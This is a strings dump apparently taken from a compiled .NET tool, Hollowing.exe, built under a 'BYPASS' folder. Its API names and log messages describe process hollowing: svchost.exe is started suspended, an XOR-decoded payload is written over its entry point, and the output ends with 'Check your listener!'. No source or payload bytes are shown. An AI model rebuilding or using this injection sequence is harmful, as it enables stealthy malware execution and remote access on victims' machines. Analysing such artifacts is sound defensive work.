!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Reserved1
ToUInt32
cbReserved2
lpReserved2
Reserved3
ToInt64
__StaticArrayInitTypeSize=375
<Module>
<PrivateImplementationDetails>
141789C9B6160CC1C29CC5F23DA3B8C45830BDFAAA2C6F0AE6FCE08884C8010C
CREATE_SUSPENDED
PROCESSBASICINFORMATION
lpNumberOfbytesRW
mscorlib
ThreadId
ProcessId
ResumeThread
hThread
MoreReserved
lpReserved
UniquePid
RuntimeFieldHandle
Console
lpTitle
lpApplicationName
DateTime
lpCommandLine
WriteLine
ValueType
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
dwFillAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
Hollowing.exe
dwXSize
dwYSize
get_Size
dwSize
System.Runtime.Versioning
ToString
ProcessHollowing
kernel32.dll
ntdll.dll
Program
System
Boolean
TimeSpan
ProcInfoLen
retlen
lpNumberOfBytesWritten
procInformation
lpProcessInformation
System.Reflection
ProcessBasicInfo
lpStartupInfo
ProcessInfo
lpDesktop
lpBuffer
BitConverter
hStdError
IntPtr
System.Diagnostics
get_TotalSeconds
dwMilliseconds
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
bInheritHandles
lpThreadAttributes
lpProcessAttributes
dwCreationFlags
dwFlags
dwXCountChars
dwYCountChars
RuntimeHelpers
procInformationClass
CreateProcess
hProcess
ZwQueryInformationProcess
PebAddress
lpBaseAddress
Concat
Format
Subtract
Object
op_Explicit
lpEnvironment
hStdInput
hStdOutput
get_Now
wShowWindow
InitializeArray
ReadProcessMemory
WriteProcessMemory
lpCurrentDirectory
WrapNonExceptionThrows
Hollowing
Copyright
2023
$ea70f58c-4fe9-4aa5-9d4c-abaffbb1c7c4
1.0.0.0
.NETFramework,Version=v4.7.2
FrameworkDisplayName
.NET Framework 4.7.2
C:\BYPASS\ConsoleApp1\Hollowing\obj\Debug\Hollowing.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
c:\windows\system32\svchost.exe
Started 'svchost.exe' in a suspended state with PID {0}. Success: {1}.
Got process information and located PEB address of process at {0}. Success: {1}.
DEBUG: Executable base address: 0x
DEBUG: e_lfanew offset: 0x
DEBUG: RVA offset: 0x
DEBUG: RVA value: 0x
Got executable entrypoint address: 0x
XOR-decoded payload.
Overwrote entrypoint with payload. Success: {0}.
Triggered payload. Success: {0}. Check your listener!
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Hollowing
FileVersion
1.0.0.0
InternalName
Hollowing.exe
LegalCopyright
Copyright
2023
LegalTrademarks
OriginalFilename
Hollowing.exe
ProductName
Hollowing
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0